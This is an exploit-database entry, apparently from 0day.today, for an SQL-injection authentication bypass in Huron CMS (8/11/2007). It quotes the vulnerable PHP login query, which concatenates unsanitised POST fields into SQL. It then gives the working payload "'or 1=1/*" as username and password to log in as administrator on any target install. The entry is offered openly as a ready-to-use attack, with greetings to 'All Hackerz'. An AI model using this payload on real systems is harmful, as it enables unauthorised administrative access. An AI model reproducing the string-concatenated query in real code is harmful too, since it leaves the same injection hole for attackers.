Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability

2010-03-30T00:00:00
ID 1337DAY-ID-11530
Type zdt
Reporter Mat
Modified 2010-03-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================================
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
=============================================================

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip
Author: mat
Mail: [email protected]
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
 
//------------------------------------------------------------------+
<?
    $consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'";
    $resultado=mysql_query($consulta,$link);
    $i=0;
    while($row = mysql_fetch_array($resultado))
    {
        $i++;
    }
    if($i>0){
?>
//------------------------------------------------------------------+
 
http://[target]/[path]/index.php
 
Put as username and password: 'or 1=1/*
You will log in as admin
 
Greetings: All Hackerz



#  0day.today [2018-04-05]  #